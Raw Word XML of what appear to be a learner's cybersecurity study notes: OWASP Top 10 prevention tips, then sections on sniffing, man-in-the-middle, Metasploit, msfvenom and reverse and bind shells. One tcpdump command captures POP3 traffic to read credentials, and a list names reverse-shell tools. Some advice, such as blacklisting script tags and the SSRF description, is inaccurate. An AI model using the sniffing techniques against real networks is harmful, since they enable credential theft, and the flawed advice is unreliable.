    <w:p w14:paraId="37D588BD" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disable caching for response with sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB9A46" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00E86C6E" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01C26">
        <w:t>Always use authenticated encryption instead of just encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A1A38" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C7EF4" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w: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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="1CC8D2B0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F476F2B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use blacklist to the inputs on the website to block any malicious words like the tag script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5280BE87" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the LIMIT and other SQL controls within queries to not expose your sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301A2F30" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00F01C26" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on your server to block any malicious injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77911EB9" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insecure Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15549AB1" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A43ABC">
        <w:t>Implementing the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> suitable design to the web applications is very important to block the way for the attacker to inject something. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BF38F6" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F92C34" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use libraries of secure design patterns on your applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21A3E0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Limit resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E98B22C" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A43ABC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do user testing to test the design of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F82E1A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D9FD8" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>The security engineers must be aware of every device on their infrastructure and why is it there. The lack of infrastructure security could help the attacker to get into the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B9F9CF" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B159F5" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Always check the configurations and setting in all the infrastructure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED4EB17" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00F40DEA" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keep all the systems updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B9817" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerable and Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34166FD1" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w: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Default="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98BFDF" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove unused dependencies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E05A96D" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="0054016E" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Only click on trusted links from official sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A418526" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DF8BE" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The passwords, cookies, and session tokens are unique for the user and should not be found by intruders. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5C6744" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF2782A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement multi-factor authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8C2A5" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement weak password checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4FF042" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00D33C0B" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Limit the requests coming from one </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC0F648" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Software and Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B50DFB" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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60E6509D" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF8FBE" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Make sure that your service only consumes trusted repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A5DC4" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ensure to apply security tools like OWASP to your service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645BF7DA" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37404342" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="000C5B5B" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37610562" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security Logging and Monitoring Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018423E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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5DB1FC7E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103061EA" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log every log in failure and wrong input in your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B291651" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00B2488F" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encode all the log data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249DFC4" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-Side Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A40D6" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>When the attacker adjusts the code to behave as they want. This could give them sensitive data about the user. Such as, cookies, log in credentials. Then the attacker can do anything that the user can do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55363B64" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C914984" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Separate your networks as many as possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE0CCC" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sanitize all the input data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD984B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not send raw responses to clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1598AA7B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="779588F4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="3EB3DF25" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="15845481" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="10AA85F9" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="78E26244" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1FE0CF7A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0E845011" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6FC40029" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00B2488F" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>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6" w:name="_Toc115782557"/>
      <w:r>
        <w:t>Self-Study</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>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7" w:name="_Toc115782558"/>
      <w:r>
        <w:t>Protocols and Servers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="6D045182" w14:textId="77777777" w:rsidR="004978C6" w:rsidRPr="004978C6" w:rsidRDefault="004978C6" w:rsidP="004978C6"/>
    <w:p w14:paraId="585B1410" w14:textId="27C3253B" w:rsidR="00223824" w:rsidRDefault="00BD0697" w:rsidP="00BD0697">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc115782559"/>
      <w:r>
        <w:t>Sniffing Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="6CB91BD7" w14:textId="01448975" w:rsidR="00BD0697" w:rsidRDefault="00BD0697" w:rsidP="00BD0697">
      <w:r>
        <w:t>Using a network packet capture tool to get information about the target is called sniffing. Tools</w:t>
      </w:r>
      <w:r w:rsidR="003B5C0B">
        <w:t xml:space="preserve"> such as, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B5C0B">
        <w:t>Tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B5C0B">
        <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 110 -A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213452A9" w14:textId="1CDC6556" w:rsidR="00A40D93" w:rsidRDefault="00A40D93" w:rsidP="00A40D93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to get the root permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BEAE67" w14:textId="7C246FA7" w:rsidR="00A40D93" w:rsidRDefault="00A40D93" w:rsidP="00A40D93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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9" w:name="_Toc115782560"/>
      <w:r>
        <w:t>Man in the Middle Attack (MITM)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>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lastRenderedPageBreak/>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20"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21"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50" w:name="_Toc115782561"/>
      <w:r>
        <w:t>Transport Layer Security (TLS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>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51" w:name="_Toc115782562"/>
      <w:r>
        <w:t>Secure Shell (SSH)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>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lastRenderedPageBreak/>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52" w:name="_Toc115782563"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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53" w:name="_Toc115782564"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>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35"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lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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bookmarkStart w:id="54" w:name="_Toc115782565"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BB4E938" w14:textId="034BD6C6" w:rsidR="00BF07AA" w:rsidRDefault="00BF07AA" w:rsidP="00BF07AA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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lastRenderedPageBreak/>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 xml:space="preserve">Then I would be able to access it from the target using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1022EE87" w14:textId="11F0EF0F" w:rsidR="005D08D6" w:rsidRDefault="00000000" w:rsidP="00B83FB4">
      <w:hyperlink r:id="rId147"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13C4391E" w:rsidR="00E648CF" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc115782566"/>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="69CFE546" w14:textId="679BA32A" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="58CF824F" w14:textId="3F6524B0" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:t xml:space="preserve">Shells are what we use to interact with the command line environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D4D07" w14:textId="3C5A3A83" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r w:rsidRPr="004E2155">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is when we force the target to connect to us.</w:t>
      </w:r>
      <w:r w:rsidR="006264C9">
        <w:t xml:space="preserve"> This methos is a good way to bypass firewalls. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EE43DB" w14:textId="49A0C220" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bind shell </w:t>
      </w:r>
      <w:r>
        <w:t>is when we connect to the target’s shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3744278F" w14:textId="28C65D18" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="004E2155">
      <w:r>
        <w:t>Here are some tools that are used for this vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE1D83" w14:textId="499EBEB7" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="006264C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A074772" w14:textId="0B803A4F" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="006264C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploit – multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149A3AB" w14:textId="6C0AB881" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="006264C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72552E30" w14:textId="17B4AF37" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="006264C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
